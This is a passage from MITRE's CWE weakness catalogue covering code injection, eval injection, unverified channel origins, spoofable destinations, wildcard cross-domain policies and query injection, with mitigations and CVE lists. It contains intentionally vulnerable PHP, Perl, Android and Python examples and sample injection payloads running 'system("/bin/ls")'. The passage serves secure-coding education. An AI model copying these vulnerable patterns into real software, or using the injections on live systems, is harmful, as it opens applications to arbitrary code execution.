syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit(). - - - - Testing - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Testing - Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - Operation - Compilation or Build Hardening - Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184). - - - Operation - Environment Hardening - Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184). - - - - - This example attempts to write user messages to a message file and allow users to view them. - - $MessageFile = "messages.out";if ($_GET["action"] == "NewMessage") {$name = $_GET["name"];$message = $_GET["message"];$handle = fopen($MessageFile, "a+");fwrite($handle, "<b>$name</b> says '$message'<hr>\n");fclose($handle);echo "Message Saved!<p>\n";}else if ($_GET["action"] == "ViewMessages") {include($MessageFile);} - - While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as: - - name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E - - which will decode to the following: - - <?php system("/bin/ls -l");?> - - The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages. - Notice that XSS (CWE-79) is also possible in this situation. - - - edit-config.pl: This CGI script is used to modify settings in a configuration file. - - use CGI qw(:standard); - sub config_file_add_key { - my ($fname, $key, $arg) = @_; - - # code to add a field/key to a file goes here - - - } - sub config_file_set_key { - my ($fname, $key, $arg) = @_; - - # code to set key to a particular file goes here - - - } - sub config_file_delete_key { - my ($fname, $key, $arg) = @_; - - # code to delete key from a particular file goes here - - - } - sub handleConfigAction { - my ($fname, $action) = @_;my $key = param('key');my $val = param('val'); - - # this is super-efficient code, especially if you have to invoke - - - - # any one of dozens of different functions! - - my $code = "config_file_$action_key(\$fname, \$key, \$val);";eval($code); - } - $configfile = "/home/cwe/config.txt";print header;if (defined(param('action'))) {handleConfigAction($configfile, param('action'));}else {print "No action specified!\n";} - - The script intends to take the 'action' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as: - - add_key(",","); system("/bin/ls"); - - This would produce the following string in handleConfigAction(): - - config_file_add_key(",","); system("/bin/ls"); - - Any arbitrary Perl code could be added after the attacker has "closed off" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker's payload is activated. This particular manipulation would fail after the system() call, because the "_key(\$fname, \$key, \$val)" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated. - - - - - CVE-2008-5071 - Eval injection in PHP program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5071 - - - CVE-2002-1750 - Eval injection in Perl program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750 - - - CVE-2008-5305 - Eval injection in Perl program using an ID that should only contain hyphens and numbers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305 - - - CVE-2002-1752 - Direct code injection into Perl eval function. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752 - - - CVE-2002-1753 - Eval injection in Perl program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753 - - - CVE-2005-1527 - Direct code injection into Perl eval function. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1527 - - - CVE-2005-2837 - Direct code injection into Perl eval function. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2837 - - - CVE-2005-1921 - MFV. code injection into PHP eval statement using nested constructs that should not be nested. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921 - - - CVE-2005-2498 - MFV. code injection into PHP eval statement using nested constructs that should not be nested. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2498 - - - CVE-2005-3302 - Code injection into Python eval statement from a field in a formatted file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3302 - - - CVE-2007-1253 - Eval injection in Python program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253 - - - CVE-2001-1471 - chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471 - - - CVE-2002-0495 - Perl code directly injected into CGI library file from parameters to another CGI program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495 - - - CVE-2005-1876 - Direct PHP code injection into supporting template file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1876 - - - CVE-2005-1894 - Direct code injection into PHP script that can be accessed by attacker. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1894 - - - CVE-2003-0395 - PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0395 - - - - - CODE - Code Evaluation and Injection - - - - - - - - - - - - Many of these weaknesses are under-studied and under-researched, and terminology is not sufficiently precise. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Research_Gaps, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Name - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Type - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Code Injection - Failure to Control Generation of Code (aka 'Code Injection') - Failure to Control Generation of Code ('Code Injection') - - - - The software establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin. - When an attacker can successfully establish a communication channel from an untrusted origin, the attacker may be able to gain privileges and access unexpected functionality. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Other - Gain Privileges or Assume Identity - Varies by Context - An attacker can access any functionality that is inadvertently accessible to the source. - - - - - Architecture and Design - - Use a mechanism that can validate the identity of the source, such as a certificate, and validate the integrity of data to ensure that it cannot be modified in transit using an Adversary-in-the-Middle (AITM) attack. - When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate. - - - - - - This Android application will remove a user account when it receives an intent to do so: - - IntentFilter filter = new IntentFilter("com.example.RemoveUser");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); - public class DeleteReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {int userID = intent.getIntExtra("userID");destroyUserData(userID);}} - - This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file. - - - These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: - - - // Android - @Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){ - if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){writeDataToView(view, UserData);return false;}else{return true;}} - } - - - - // iOS - -(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{ - NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@"exampleScheme"]){ - NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@"specialFunction"]){ - - - // Make data available back in webview. - UIWebView *webView = [self writeDataToView:[URL query]]; - }return NO; - }return YES; - } - - A call into native code can then be initiated by passing parameters within the URL: - - window.location = examplescheme://method?parameter=value - - Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. - - - - - CVE-2000-1218 - DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1218 - - - CVE-2005-0877 - DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0877 - - - CVE-2001-1452 - DNS server caches glue records received from non-delegated name servers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1452 - - - - - - - - - - - - While many access control issues involve authenticating the user, this weakness is more about authenticating the actual source of the communication channel itself; there might not be any "user" in such cases. - - - - CWE Content Team - MITRE - 2014-02-13 - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2021-07-20 - updated Potential_Mitigations - - - - - The software creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor. - - Attackers at the destination may be able to spoof trusted servers to steal data or cause a denial of service. - There are at least two distinct weaknesses that can cause the software to communicate with an unintended destination: - - - If the software allows an attacker to control which destination is specified, then the attacker can cause it to connect to an untrusted or malicious destination. For example, because UDP is a connectionless protocol, UDP packets can be spoofed by specifying a false source address in the packet; when the server receives the packet and sends a reply, it will specify a destination by using the source of the incoming packet - i.e., the false source. The server can then be tricked into sending traffic to the wrong host, which is effective for hiding the real source of an attack and for conducting a distributed denial of service (DDoS). As another example, server-side request forgery (SSRF) and XML External Entity (XXE) can be used to trick a server into making outgoing requests to hosts that cannot be directly accessed by the attacker due to firewall restrictions. - If the software incorrectly specifies the destination, then an attacker who can control this destination might be able to spoof trusted servers. While the most common occurrence is likely due to misconfiguration by an administrator, this can be resultant from other weaknesses. For example, the software might incorrectly parse an e-mail or IP address and send sensitive data to an unintended destination. As another example, an Android application may use a "sticky broadcast" to communicate with a receiver for a particular application, but since sticky broadcasts can be processed by *any* receiver, this can allow a malicious application to access restricted data that was only intended for a different application. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - This code listens on a port for DNS requests and sends the result to the requesting address. - - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true: - data = sock.recvfrom(1024)if not data:break - (requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record) - - - - This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed ('spoofed'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic. - - - - - CVE-2013-5211 - composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211 - - - CVE-1999-0513 - Classic "Smurf" attack, using spoofed ICMP packets to broadcast addresses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0513 - - - CVE-1999-1379 - DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1379 - - - - - - - - - CWE Content Team - MITRE - 2014-02-13 - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - The software uses a cross-domain policy file that includes domains that should not be trusted. - - A cross-domain policy file ("crossdomain.xml" in Flash and "clientaccesspolicy.xml" in Silverlight) defines a list of domains from which a server is allowed to make cross-domain requests. When making a cross-domain request, the Flash or Silverlight client will first look for the policy file on the target server. If it is found, and the domain hosting the application is explicitly allowed to make requests, the request is made. - Therefore, if a cross-domain policy file includes domains that should not be trusted, such as when using wildcards, then the application could be attacked by these untrusted domains. - An overly permissive policy file allows many of the same attacks seen in Cross-Site Scripting (CWE-79). Once the user has executed a malicious Flash or Silverlight application, they are vulnerable to a variety of attacks. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. - In many cases, the attack can be launched without the victim even being aware of it. - - - - - - - - - - - - - Implementation - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Access Control - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Read Application Data - Varies by Context - An attacker may be able to bypass the web browser's same-origin policy. An attacker can exploit the weakness to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running ActiveX controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content. - - - - - Architecture and Design - Attack Surface Reduction - Avoid using wildcards in the cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server. - - - Architecture and Design - Operation - Environment Hardening - For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server. - - - Architecture and Design - Operation - Attack Surface Reduction - For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server. - - - - - These cross-domain policy files mean to allow Flash and Silverlight applications hosted on other domains to access its data: - Flash crossdomain.xml : - - <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"><allow-access-from domain="*.example.com"/><allow-access-from domain="*"/></cross-domain-policy> - - Silverlight clientaccesspolicy.xml : - - <?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="SOAPAction"><domain uri="*"/></allow-from><grant-to><resource path="/" include-subpaths="true"/></grant-to></policy></cross-domain-access></access-policy> - - These entries are far too permissive, allowing any Flash or Silverlight application to send requests. A malicious application hosted on any other web site will be able to send requests on behalf of any user tricked into executing it. - - - - - CVE-2012-2292 - Product has a Silverlight cross-domain policy that does not restrict access to another application, which allows remote attackers to bypass the Same Origin Policy. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2292 - - - CVE-2014-2049 - The default Flash Cross Domain policies in a product allows remote attackers to access user files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2049 - - - CVE-2007-6243 - Chain: Adobe Flash Player does not sufficiently restrict the interpretation and usage of cross-domain policy files, which makes it easier for remote attackers to conduct cross-domain and cross-site scripting (XSS) attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6243 - - - CVE-2008-4822 - Chain: Adobe Flash Player and earlier does not properly interpret policy files, which allows remote attackers to bypass a non-root domain policy. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4822 - - - CVE-2010-3636 - Chain: Adobe Flash Player does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3636 - - - - - - - - - - - - CWE Content Team - MITRE - 2014-06-05 - Created by MITRE with input from members of the CWE-Research mailing list. - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Description, Name - - Overly Permissive Cross-domain Whitelist - - - - The application generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query. - - Depending on the capabilities of the query language, an attacker could inject additional logic into the query to: - - - Modify the intended selection criteria, thus changing which data entities (e.g., records) are returned, modified, or otherwise manipulated - Append additional commands to the query - Return more entities than intended - Return fewer entities than intended - Cause entities to be sorted in an unexpected way - - - The ability to execute additional commands or change which entities are returned has obvious risks. But when the application logic depends on the order or number of entities, this can also lead to vulnerabilities. For example, if the application query expects to return only one entity that specifies an administrative user, but an attacker can change which entities are returned, this could cause the logic to return information for a regular user and incorrectly assume that the user has administrative privileges. - While this weakness is most commonly associated with SQL injection, there are many other query languages that are also subject to injection attacks, including HTSQL, LDAP, DQL, XQuery, Xpath, and "NoSQL" languages. - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Access Control - Bypass Protection Mechanism - Read Application Data - Modify Application Data - Varies by Context - - - - - CVE-2014-2503 - Injection using Documentum Query Language (DQL) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2503 - - - CVE-2014-2508 - Injection using Documentum Query Language (DQL) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2508 - - - - It could be argued that data query languages are effectively a command language - albeit with a limited set of commands - and thus any query-language injection issue could be treated as a child of CWE-74. However, CWE-943 is intended to better organize query-oriented issues to separate them from fully-functioning programming languages, and also to provide a more precise identifier for the many query languages that do not have their own CWE identifier. - - - - CWE Content Team - MITRE - 2014-06-19 - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. "eval"). - This may allow an attacker to execute arbitrary code, or at least modify what code can be executed. - - - - - - Primary - - - - - - - - - - - - - - Architecture and Design - This weakness is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables. - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Confidentiality - Read Files or Directories - Read Application Data - The injected code could access restricted data / files. - - - Access Control - Bypass Protection Mechanism - In some cases, injectable code controls authentication; this may lead to a remote vulnerability. - - - Access Control - Gain Privileges or Assume Identity - Injected code can access resources that the attacker is directly prevented from accessing. - - - Integrity - Confidentiality - Availability - Other - Execute Unauthorized Code or Commands - Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code. - - - Non-Repudiation - Hide Activities - Often the actions performed by injected control code are unlogged. - - - - - Architecture and Design - Implementation - If possible, refactor your code so that it does not need to use eval() at all. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control. - Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content. - - - - - - edit-config.pl: This CGI script is used to modify settings in a configuration file. - - use CGI qw(:standard); - sub config_file_add_key { - my ($fname, $key, $arg) = @_; - - # code to add a field/key to a file goes here - - - } - sub config_file_set_key { - my ($fname, $key, $arg) = @_; - - # code to set key to a particular file goes here - - - } - sub config_file_delete_key { - my ($fname, $key, $arg) = @_; - - # code to delete key from a particular file goes here - - - } - sub handleConfigAction { - my ($fname, $action) = @_;my $key = param('key');my $val = param('val'); - - # this is super-efficient code, especially if you have to invoke - - - - # any one of dozens of different functions! - - my $code = "config_file_$action_key(\$fname, \$key, \$val);";eval($code); - } - $configfile = "/home/cwe/config.txt";print header;if (defined(param('action'))) {handleConfigAction($configfile, param('action'));}else {print "No action specified!\n";} - - The script intends to take the 'action' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as: - - add_key(",","); system("/bin/ls"); - - This would produce the following string in handleConfigAction(): - - config_file_add_key(",","); system("/bin/ls"); - - Any arbitrary Perl code could be added after the attacker has "closed off" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker's payload is activated. This particular manipulation would fail after the system() call, because the "_key(\$fname, \$key, \$val)" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated. - - - - - CVE-2008-5071 - Eval injection in PHP program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5071 - - - CVE-2002-1750 - Eval injection in Perl program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750 - - - CVE-2008-5305 - Eval injection in Perl program using an ID that should only contain hyphens and numbers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305 - - - CVE-2002-1752 - Direct code injection into Perl eval function. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752 - - - CVE-2002-1753 - Eval injection in Perl program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753 - - - CVE-2005-1527 - Direct code injection into Perl eval function. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1527 - - - CVE-2005-2837 - Direct code injection into Perl eval function. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2837 - - - CVE-2005-1921 - MFV. code injection into PHP eval statement using nested constructs that should not be nested. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921 - - - CVE-2005-2498 - MFV. code injection into PHP eval statement using nested constructs that should not be nested. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2498 - - - CVE-2005-3302 - Code injection into Python eval statement from a field in a formatted file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3302 - - - CVE-2007-1253 - Eval injection in Python program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253 - - - CVE-2001-1471 - chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471 - - - CVE-2007-2713 - Chain: Execution after redirect triggers eval injection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713 - - - - - Direct Dynamic Code Evaluation ('Eval Injection') - - - A3 - Malicious File Execution - CWE More Specific - - - A6 - Injection Flaws - CWE More Specific - - - SFP24 - Tainted input to command - - - IDS35-PL - Do not invoke the eval form with a string argument - Exact - - - - - - - - - - Factors: special character errors can play a role in increasing the variety of code that can be injected, although some vulnerabilities do not require special characters at all, e.g. when a single function without arguments can be referenced and a terminator character is not necessary. - This issue is probably under-reported. Most relevant CVEs have been for Perl and PHP, but eval injection applies to most interpreted languages. Javascript eval injection is likely to be heavily under-reported. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Observed_Examples, Other_Notes, Research_Gaps - - - CWE Content Team - MITRE - 2009-05-27 - updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Name, References - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Direct Dynamic Code Evaluation ('Eval Injection') - Insufficient Control of Directives in Dynamically Evaluated Code (aka 'Eval Injection') - Improper Sanitization of Directives in Dynamically Evaluated Code ('Eval Injection') - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template. - - - - - - Primary - - - - - - - - - - Architecture and Design - This issue is most frequently found in PHP applications that allow users to set configuration variables that are stored within executable PHP files. Technically, this could also be performed in some compiled code (e.g. by byte-patching an executable), although it is highly unlikely. - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Read Files or Directories - Read Application Data - The injected code could access restricted data / files. - - - Access Control - Bypass Protection Mechanism - In some cases, injectable code controls authentication; this may lead to a remote vulnerability. - - - Access Control - Gain Privileges or Assume Identity - Injected code can access resources that the attacker is directly prevented from accessing. - - - Integrity - Confidentiality - Availability - Other - Execute Unauthorized Code or Commands - Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code. - - - Non-Repudiation - Hide Activities - Often the actions performed by injected control code are unlogged. - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - Perform proper output validation and escaping to neutralize all code syntax from data written to code files. - - - - - This example attempts to write user messages to a message file and allow users to view them. - - $MessageFile = "messages.out";if ($_GET["action"] == 